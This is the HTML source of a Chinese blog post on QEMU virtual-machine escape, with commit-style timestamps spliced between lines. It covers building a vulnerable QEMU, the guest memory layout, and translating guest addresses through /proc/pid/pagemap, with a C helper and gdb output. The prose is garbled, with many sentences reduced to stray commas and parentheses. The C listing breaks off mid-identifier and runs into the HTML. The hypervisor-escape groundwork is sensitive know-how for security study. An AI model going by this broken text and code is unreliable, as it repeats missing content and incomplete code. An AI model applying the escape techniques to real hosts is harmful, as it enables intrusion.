2021-04-10 10:53:27 +00:00
<!DOCTYPE html>
2021-04-10 12:03:10 +00:00
< html class = "theme-next muse use-motion" lang = "zh-Hans" >
2021-04-10 10:53:27 +00:00
< head > < meta name = "generator" content = "Hexo 3.8.0" >
< meta charset = "UTF-8" >
< meta http-equiv = "X-UA-Compatible" content = "IE=edge" >
< meta name = "viewport" content = "width=device-width, initial-scale=1, maximum-scale=1" >
< meta name = "theme-color" content = "#222" >
2021-04-10 19:19:48 +00:00
< script src = "/lib/pace/pace.min.js?v=1.0.2" > < / script >
< link href = "/lib/pace/pace-theme-center-atom.min.css?v=1.0.2" rel = "stylesheet" >
2021-04-10 10:53:27 +00:00
< meta http-equiv = "Cache-Control" content = "no-transform" >
< meta http-equiv = "Cache-Control" content = "no-siteapp" >
< link href = "/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel = "stylesheet" type = "text/css" >
< link href = "/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel = "stylesheet" type = "text/css" >
< link href = "/css/main.css?v=5.1.4" rel = "stylesheet" type = "text/css" >
< link rel = "apple-touch-icon" sizes = "180x180" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "32x32" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "16x16" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "mask-icon" href = "/images/logo.svg?v=5.1.4" color = "#222" >
< meta name = "keywords" content = "CVE,QEMU,信息泄露," >
2021-04-10 13:53:56 +00:00
< meta name = "description" content = "进入QEMU虚拟机逃逸的世界" >
2021-04-10 10:53:27 +00:00
< meta name = "keywords" content = "CVE,QEMU,信息泄露" >
< meta property = "og:type" content = "article" >
< meta property = "og:title" content = "VM escape-QEMU Case Study" >
< meta property = "og:url" content = "https://cool-y.github.io/2021/04/10/vm-escape1/index.html" >
< meta property = "og:site_name" content = "混元霹雳手" >
2021-04-10 13:53:56 +00:00
< meta property = "og:description" content = "进入QEMU虚拟机逃逸的世界" >
2021-04-10 10:53:27 +00:00
< meta property = "og:locale" content = "zh-Hans" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1618050992/VMescape/image_29.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1618050992/VMescape/image_30.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1618050992/VMescape/image_31.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1618050992/VMescape/image_32.png" >
2021-04-10 13:53:56 +00:00
< meta property = "og:updated_time" content = "2021-04-10T13:33:14.007Z" >
2021-04-10 10:53:27 +00:00
< meta name = "twitter:card" content = "summary" >
< meta name = "twitter:title" content = "VM escape-QEMU Case Study" >
2021-04-10 13:53:56 +00:00
< meta name = "twitter:description" content = "进入QEMU虚拟机逃逸的世界" >
2021-04-10 10:53:27 +00:00
< meta name = "twitter:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1618050992/VMescape/image_29.png" >
< script type = "text/javascript" id = "hexo.configurations" >
var NexT = window.NexT || {};
var CONFIG = {
root: '/',
2021-04-10 12:03:10 +00:00
scheme: 'Muse',
2021-04-10 10:53:27 +00:00
version: '5.1.4',
2021-04-10 20:13:11 +00:00
sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":true,"onmobile":true},
2021-04-10 10:53:27 +00:00
fancybox: true,
tabs: true,
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
duoshuo: {
userId: '0',
author: '博主'
},
algolia: {
applicationID: '',
apiKey: '',
indexName: '',
hits: {"per_page":10},
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
}
};
< / script >
< link rel = "canonical" href = "https://cool-y.github.io/2021/04/10/vm-escape1/" >
< title > VM escape-QEMU Case Study | 混元霹雳手< / title >
< / head >
< body itemscope itemtype = "http://schema.org/WebPage" lang = "zh-Hans" >
< div class = "container sidebar-position-left page-post-detail" >
< div class = "headband" > < / div >
< header id = "header" class = "header" itemscope itemtype = "http://schema.org/WPHeader" >
< div class = "header-inner" > < div class = "site-brand-wrapper" >
< div class = "site-meta " >
< div class = "custom-logo-site-title" >
< a href = "/" class = "brand" rel = "start" >
< span class = "logo-line-before" > < i > < / i > < / span >
< span class = "site-title" > 混元霹雳手< / span >
< span class = "logo-line-after" > < i > < / i > < / span >
< / a >
< / div >
2021-04-10 20:10:04 +00:00
< p class = "site-subtitle" > Battle⚔️ < / p >
2021-04-10 10:53:27 +00:00
< / div >
< div class = "site-nav-toggle" >
< button >
< span class = "btn-bar" > < / span >
< span class = "btn-bar" > < / span >
< span class = "btn-bar" > < / span >
< / button >
< / div >
< / div >
< nav class = "site-nav" >
< ul id = "menu" class = "menu" >
< li class = "menu-item menu-item-home" >
< a href = "/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-home" > < / i > < br >
首页
< / a >
< / li >
< li class = "menu-item menu-item-about" >
< a href = "/about/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-user" > < / i > < br >
关于
< / a >
< / li >
< li class = "menu-item menu-item-tags" >
< a href = "/tags/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-tags" > < / i > < br >
标签
< / a >
< / li >
< li class = "menu-item menu-item-categories" >
< a href = "/categories/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-th" > < / i > < br >
分类
< / a >
< / li >
< li class = "menu-item menu-item-archives" >
< a href = "/archives/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-archive" > < / i > < br >
归档
< / a >
< / li >
< li class = "menu-item menu-item-bookmarks" >
< a href = "/bookmarks/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-map" > < / i > < br >
书签
< / a >
< / li >
< li class = "menu-item menu-item-hack之外" >
< a href = "/hack之外/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-heartbeat" > < / i > < br >
HACK之外
< / a >
< / li >
< / ul >
< / nav >
< / div >
< / header >
< main id = "main" class = "main" >
< div class = "main-inner" >
< div class = "content-wrap" >
< div id = "content" class = "content" >
< div id = "posts" class = "posts-expand" >
< article class = "post post-type-normal" itemscope itemtype = "http://schema.org/Article" >
< div class = "post-block" >
< link itemprop = "mainEntityOfPage" href = "https://cool-y.github.io/2021/04/10/vm-escape1/" >
< span hidden itemprop = "author" itemscope itemtype = "http://schema.org/Person" >
< meta itemprop = "name" content = "Cool-Y" >
< meta itemprop = "description" content >
< meta itemprop = "image" content = "/images/avatar.png" >
< / span >
< span hidden itemprop = "publisher" itemscope itemtype = "http://schema.org/Organization" >
< meta itemprop = "name" content = "混元霹雳手" >
< / span >
< header class = "post-header" >
< h1 class = "post-title" itemprop = "name headline" > VM escape-QEMU Case Study< / h1 >
< div class = "post-meta" >
< span class = "post-time" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-calendar-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 发表于< / span >
< time title = "创建于" itemprop = "dateCreated datePublished" datetime = "2021-04-10T18:25:46+08:00" >
2021-04-10
< / time >
< / span >
< span class = "post-category" >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-folder-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 分类于< / span >
< span itemprop = "about" itemscope itemtype = "http://schema.org/Thing" >
< a href = "/categories/Pwn/" itemprop = "url" rel = "index" >
< span itemprop = "name" > Pwn< / span >
< / a >
< / span >
< / span >
< span id = "/2021/04/10/vm-escape1/" class = "leancloud_visitors" data-flag-title = "VM escape-QEMU Case Study" >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-eye" > < / i >
< / span >
< span class = "post-meta-item-text" > 阅读次数: < / span >
< span class = "leancloud-visitors-count" > < / span >
< / span >
< div class = "post-wordcount" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-file-word-o" > < / i >
< / span >
< span title = "字数统计" >
4.8k 字
< / span >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-clock-o" > < / i >
< / span >
< span title = "阅读时长" >
20 分钟
< / span >
< / div >
2021-04-10 13:26:15 +00:00
< div class = "post-description" >
2021-04-10 13:53:56 +00:00
进入QEMU虚拟机逃逸的世界
2021-04-10 13:26:15 +00:00
< / div >
2021-04-10 10:53:27 +00:00
< / div >
< / header >
< div class = "post-body" itemprop = "articleBody" >
< h2 id = "1-Intro" > < a href = "#1-Intro" class = "headerlink" title = "1 Intro" > < / a > 1 Intro< / h2 > < p > 如今,虚拟机已大量部署以供个人使用或在企业细分市场中使用。 网络安全供应商使用不同的VM在< em > 受控和受限< / em > 的环境中分析恶意软件。 一个自然的问题出现了:< strong > 恶意软件能否从虚拟机中逃脱并在主机上执行代码?< / strong > < / p >
< p > 2015年, ( < a href = "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3456" target = "_blank" rel = "noopener" > CVE-2015-3456< / a > ) , , , ( < a href = "https://www.crowdstrike.com/blog/venom-vulnerability-details/" target = "_blank" rel = "noopener" > VENOM< / a > ),这并不是第一个此类漏洞。< / p >
< p > 2011年, < a href = "https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2011/BH_US_11_Elhage_Virtunoid_WP.pdf" target = "_blank" rel = "noopener" > Nelson Elhage< / a > 在Blackhat 报告并成功利用了QEMU模拟PCI设备热插拔中的< a href = "https://github.com/nelhage/virtunoid" target = "_blank" rel = "noopener" > 漏洞< / a > 。< / p >
< p > 2016年, ( ) < / p >
< p > 在本文中, ( ) ( ) , < / p >
< p > 我们讨论了技术细节, < strong > 网卡设备仿真< / strong > 中的漏洞, < / p >
< h2 id = "2-KVM-QEMU-Overview" > < a href = "#2-KVM-QEMU-Overview" class = "headerlink" title = "2 KVM/QEMU Overview" > < / a > 2 KVM/QEMU Overview< / h2 > < p > KVM( , ) , < / p >
< p > KVM的用户空间组件包含在主线QEMU( ) , < / p >
< h3 id = "2-1-Workspace-Environment" > < a href = "#2-1-Workspace-Environment" class = "headerlink" title = "2.1 Workspace Environment" > < / a > 2.1 Workspace Environment< / h3 > < p > 为了使那些想使用本文中给出的示例代码的人更轻松,我们在此处提供了重现我们的开发环境的主要步骤。< / p >
< p > 由于我们定位的漏洞已经修复, , , , , : < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > $ git clone git://git.qemu-project.org/qemu.git< / span > < br > < span class = "line" > $< / span > < br > < span class = "line" > $ git checkout bd80b59< / span > < br > < span class = "line" > $ mkdir -p bin/debug/native< / span > < br > < span class = "line" > $ cd bin/debug/native< / span > < br > < span class = "line" > $ ../../../configure --target-list=x86_64-softmmu --enable-debug --disable-werror< / span > < br > < span class = "line" > $ make< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 使用qemu-img来生成一个qcow2系统文件< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > **`$`**` ./qemu-img create -f qcow2 ubuntu.qcow2 20G`< / span > < br > < span class = "line" > $ sudo chmod 666 /dev/kvm< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 之后首先通过qemu-system-x86_64完成对qcow2系统文件中系统的安装, < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > $ ./x86_64-softmmu/qemu-system-x86_64 -enable-kvm -m 2048 -hda ./ubuntu.qcow2 -cdrom\< / span > < br > < span class = "line" > ' /home/han/VMescape/ubuntu-16.04-server-amd64.iso' < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 安装完成后就获得了一个有系统的qcow2文件, : , : < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > ✗ sudo tunctl -t tap0 -u `whoami`< / span > < br > < span class = "line" > ✗ sudo ifconfig tap0 192.168.2.1/24< / span > < br > < span class = "line" > $ ./x86_64-softmmu/qemu-system-x86_64 -enable-kvm -m 2048 -display vnc=:89 \< / span > < br > < span class = "line" > -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 -netdev user,id=t1, \< / span > < br > < span class = "line" > -device pcnet,netdev=t1,id=nic1 -drive \< / span > < br > < span class = "line" > file=/home/han/VMescape/qemu/bin/debug/native/ubuntu.qcow2,\< / span > < br > < span class = "line" > format=qcow2,if=ide,cache=writeback,\< / span > < br > < span class = "line" > -net nic -net tap,ifname=tap0,script=no,downscript=no< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 使用vncviewer连接qemu< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > `apt-get install xvnc4viewer`< / span > < br > < span class = "line" > vncviewer 127.0.0.1:5989< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-04-10 12:03:10 +00:00
< h3 id = "2-2-QEMU-Memory-Layout" > < a href = "#2-2-QEMU-Memory-Layout" class = "headerlink" title = "2.2 QEMU Memory Layout" > < / a > 2.2 QEMU Memory Layout< / h3 > < p > 分配给guest虚拟机的物理内存实际上是QEMU虚拟地址空间中mmapp专用的区域。 重要的是要注意, < / p >
2021-04-10 10:53:27 +00:00
< p > 下图说明了来宾的内存和主机的内存如何共存。< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > Guest' processes< / span > < br > < span class = "line" > +--------------------+< / span > < br > < span class = "line" > Virtual addr space | |< / span > < br > < span class = "line" > +--------------------+< / span > < br > < span class = "line" > | |< / span > < br > < span class = "line" > **\__ Page Table \__< / span > < br > < span class = "line" > \ \**< / span > < br > < span class = "line" > | | Guest kernel< / span > < br > < span class = "line" > +----+--------------------+----------------+< / span > < br > < span class = "line" > Guest' s phy. memory | | | |< / span > < br > < span class = "line" > +----+--------------------+----------------+< / span > < br > < span class = "line" > | |< / span > < br > < span class = "line" > **\__ \__< / span > < br > < span class = "line" > \ \**< / span > < br > < span class = "line" > | QEMU process |< / span > < br > < span class = "line" > +----+------------------------------------------+< / span > < br > < span class = "line" > Virtual addr space | | |< / span > < br > < span class = "line" > +----+------------------------------------------+< / span > < br > < span class = "line" > | |< / span > < br > < span class = "line" > \__ Page Table \__< / span > < br > < span class = "line" > \ \< / span > < br > < span class = "line" > | |< / span > < br > < span class = "line" > +----+-----------------------------------------------++< / span > < br > < span class = "line" > Physical memory | | ||< / span > < br > < span class = "line" > +----+-----------------------------------------------++< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 此外, : < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > ✗ cat /proc/36220/maps< / span > < br > < span class = "line" > 555aae05c000-555aae931000 r-xp 00000000 08:01 2239549 /usr/bin/qemu-system-x86_64< / span > < br > < span class = "line" > 555aaeb30000-555aaecfc000 r--p 008d4000 08:01 2239549 /usr/bin/qemu-system-x86_64< / span > < br > < span class = "line" > 555aaecfc000-555aaed7b000 rw-p 00aa0000 08:01 2239549 /usr/bin/qemu-system-x86_64< / span > < br > < span class = "line" > 555aaed7b000-555aaf1de000 rw-p 00000000 00:00 0< / span > < br > < span class = "line" > 555ab0c1c000-555ab2015000 rw-p 00000000 00:00 0 [heap]< / span > < br > < span class = "line" > 7f90b2e2b000-7f90b2e38000 r-xp 00000000 08:01 2758598 /usr/lib/x86_64-linux-gnu/sasl2/libdigestmd5.so.2.0.25< / span > < br > < span class = "line" > 7f90b2e38000-7f90b3037000 ---p 0000d000 08:01 2758598 /usr/lib/x86_64-linux-gnu/sasl2/libdigestmd5.so.2.0.25< / span > < br > < span class = "line" > 7f90b3037000-7f90b3038000 r--p 0000c000 08:01 2758598 /usr/lib/x86_64-linux-gnu/sasl2/libdigestmd5.so.2.0.25< / span > < br > < span class = "line" > 7f90b3038000-7f90b3039000 rw-p 0000d000 08:01 2758598 /usr/lib/x86_64-linux-gnu/sasl2/libdigestmd5.so.2.0.25< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > .... [other shared libs]< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > 7f9152f96000-7f9152f99000 rw-s 00000000 00:0e 12527 anon_inode:kvm-vcpu:0< / span > < br > < span class = "line" > 7f9152f99000-7f9152f9a000 r--p 00029000 08:01 2374490 /lib/x86_64-linux-gnu/ld-2.27.so< / span > < br > < span class = "line" > 7f9152f9a000-7f9152f9b000 rw-p 0002a000 08:01 2374490 /lib/x86_64-linux-gnu/ld-2.27.so< / span > < br > < span class = "line" > 7f9152f9b000-7f9152f9c000 rw-p 00000000 00:00 0< / span > < br > < span class = "line" > 7ffe2cf63000-7ffe2cf84000 rw-p 00000000 00:00 0 [stack]< / span > < br > < span class = "line" > 7ffe2cf8f000-7ffe2cf92000 r--p 00000000 00:00 0 [vvar]< / span > < br > < span class = "line" > 7ffe2cf92000-7ffe2cf93000 r-xp 00000000 00:00 0 [vdso]< / span > < br > < span class = "line" > ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall]< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 有关虚拟化环境中内存管理的更详细说明,请参见:< a href = "http://lettieri.iet.unipi.it/virtualization/2014/Vtx.pdf" target = "_blank" rel = "noopener" > http://lettieri.iet.unipi.it/virtualization/2014/Vtx.pdf< / a > < / p >
< h3 id = "2-3-Address-Translation" > < a href = "#2-3-Address-Translation" class = "headerlink" title = "2.3 Address Translation" > < / a > 2.3 Address Translation< / h3 > < p > 在QEMU中存在两个翻译层: < / p >
< ul >
< li > 从Guest虚拟地址到Guest物理地址。 在我们的利用中, , < strong > 物理地址< / strong > 以正确配置网卡设备。< / li >
< li > 从Guest物理地址到QEMU的虚拟地址空间。 在我们的攻击中,我们需要注入伪造的结构,并在< strong > QEMU的虚拟地址空间< / strong > 中获得其精确地址。< / li >
< / ul >
< p > 在x64系统上, ( ) , ( , < code > physical_address = PFN * page_size + offset< / code > < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > **- Bits 0-54 : physical frame number if present.**< / span > < br > < span class = "line" > - Bit 55 : page table entry is soft-dirty.< / span > < br > < span class = "line" > - Bit 56 : page exclusively mapped.< / span > < br > < span class = "line" > - Bits 57-60 : zero< / span > < br > < span class = "line" > - Bit 61 : page is file-page or shared-anon.< / span > < br > < span class = "line" > - Bit 62 : page is swapped.< / span > < br > < span class = "line" > - Bit 63 : page is present.< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 将< a href = "https://shanetully.com/2014/12/translating-virtual-addresses-to-physcial-addresses-in-user-space/" target = "_blank" rel = "noopener" > 虚拟地址( ) ( ) < / a > 的过程包括< / p >
< ol >
< li > < p > 64wei每个页面的大小为 < code > 4096< / code > 字节,即 < code > 1 < < 12< / code > ; < / p >
< / li >
< li > < p > 基于 < code > /proc/pid/pagemap< / code > 可以查看进程任意 Virtual Page 的状态,包括是否被映射到物理内存以及在物理内存中的 Page Frame Number( ) ; < / p >
< ul >
< li > < code > pagemap< / code > 文件为每个 Virtual Page 存储 < code > 64< / code > 位(即 < code > 8< / code > 字节)的信息,数据格式如上。< / li >
< / ul >
< / li >
< li > < p > 对任意的虚拟地址 < code > address< / code > ,基于 < code > address/4096< / code > 可以计算出该虚拟地址在 < code > pagemap< / code > 文件中的索引值, < code > address/4096 * 8< / code > 即对应的文件偏移值,在该位置能够获取< strong > PFN< / strong > 信息;< / p >
< / li >
< li > < p > 页内偏移对任意的虚拟地址 < code > address< / code > , < code > address%4096< / code > 即虚拟地址在对应的内存页中的< strong > 偏移值< / strong > ; < / p >
< / li >
< li > < p > 根据物理内存的 PFN ( < strong > physical frame number< / strong > )以及页内偏移,就可以计算出对应的物理地址;< / p >
< / li >
< / ol >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > `physical_address = PFN * page_size + offset< / span > < br > < span class = "line" > physcial_addr ``=`` ``(``page_frame_number ``< < `` PAGE_SHIFT``)`` ``+`` distance_from_page_boundary_of_buffer`< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 我们依靠Nelson Elhage的< a href = "https://github.com/nelhage/virtunoid/blob/master/virtunoid.c" target = "_blank" rel = "noopener" > 代码< / a > 。 下面的程序分配一个缓冲区, < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < span class = "line" > 39< / span > < br > < span class = "line" > 40< / span > < br > < span class = "line" > 41< / span > < br > < span class = "line" > 42< / span > < br > < span class = "line" > 43< / span > < br > < span class = "line" > 44< / span > < br > < span class = "line" > 45< / span > < br > < span class = "line" > 46< / span > < br > < span class = "line" > 47< / span > < br > < span class = "line" > 48< / span > < br > < span class = "line" > 49< / span > < br > < span class = "line" > 50< / span > < br > < span class = "line" > 51< / span > < br > < span class = "line" > 52< / span > < br > < span class = "line" > 53< / span > < br > < span class = "line" > 54< / span > < br > < span class = "line" > 55< / span > < br > < span class = "line" > 56< / span > < br > < span class = "line" > 57< / span > < br > < span class = "line" > 58< / span > < br > < span class = "line" > 59< / span > < br > < span class = "line" > 60< / span > < br > < span class = "line" > 61< / span > < br > < span class = "line" > 62< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > ---[ mmu.c ]---< / span > < br > < span class = "line" > #include < stdio.h> < / span > < br > < span class = "line" > #include < string.h> < / span > < br > < span class = "line" > #include < stdint.h> < / span > < br > < span class = "line" > #include < stdlib.h> < / span > < br > < span class = "line" > #include < fcntl.h> < / span > < br > < span class = "line" > #include < assert.h> < / span > < br > < span class = "line" > #include < inttypes.h> < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > #define PAGE_SHIFT 12< / span > < br > < span class = "line" > #define PAGE_SIZE (1 < < PAGE_SHIFT)< / span > < br > < span class = "line" > #define PFN_PRESENT (1ull < < 63)< / span > < br > < span class = "line" > #define PFN_PFN ((1ull < < 55) - 1)< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > int fd;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > uint32_t page_offset(uint32_t addr)< / span > < br > < span class = "line" > { < / span > < br > < span class = "line" > return addr & ((1 < < PAGE_SHIFT) - 1);< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > uint64_t gva_to_gfn(void *addr)< / span > < br > < span class = "line" > { < / span > < br > < span class = "line" > uint64_t pme, gfn;< / span > < br > < span class = "line" > size_t offset;< / span > < br > < span class = "line" > offset = ((uintptr_t)addr > > 9) & ~7;< / span > < br > < span class = "line" > lseek(fd, offset, SEEK_SET);< / span > < br > < span class = "line" > read(fd, & pme, 8);< / span > < br > < span class = "line" > if (!(pme & PFN_PRESENT))< / span > < br > < span class = "line" > return -1;< / span > < br > < span class = "line" > # The page frame number is in bits 0-54 so read the first 7 bytes and clear the 55th bit< / span > < br > < span class = "line" > gfn = pme & PFN_PFN;< / span > < br > < span class = "line" > return gfn;< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > uint64_t gva_to_gpa(void *addr)< / span > < br > < span class = "line" > { < / span > < br > < span class = "line" > uint64_t gfn = gva_to_gfn(add
< p > 静态编译好程序之后将其上传到 QEMU 虚拟机中以 < code > root< / code > 身份执行,打印出物理地址为 < code > 0x73b17b20< / code > < br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1618050992/VMescape/image_29.png" alt > < br > 在主机将gdb附加到QEMU进程, , < strong > guest物理内存基址< / strong > 的偏移量。< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > ✗ sudo gdb qemu-system-x86_64 38140< / span > < br > < span class = "line" > (gdb) info proc mappings< / span > < br > < span class = "line" > process 38140< / span > < br > < span class = "line" > Mapped address spaces:< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > Start Addr End Addr Size Offset objfile< / span > < br > < span class = "line" > 0x556857048000 0x55685791d000 0x8d5000 0x0 /usr/bin/qemu-system-x86_64< / span > < br > < span class = "line" > 0x556857b1c000 0x556857ce8000 0x1cc000 0x8d4000 /usr/bin/qemu-system-x86_64< / span > < br > < span class = "line" > 0x556857ce8000 0x556857d67000 0x7f000 0xaa0000 /usr/bin/qemu-system-x86_64< / span > < br > < span class = "line" > 0x556857d67000 0x5568581ca000 0x463000 0x0< / span > < br > < span class = "line" > 0x556859c27000 0x55685b038000 0x1411000 0x0 [heap]< / span > < br > < span class = "line" > ... ... ... ...< / span > < br > < span class = "line" > **0x7f72afe00000** **** **0x7f732fe00000** **** **0x80000000** 0x0 [2GB RAM]< / span > < br > < span class = "line" > ... ... ... ...< / span > < br > < span class = "line" > (gdb) x/s 0x7f72afe00000+0x73b17b20< / span > < br > < span class = "line" > 0x7f7323917b20: " Where am I?" < / span > < br 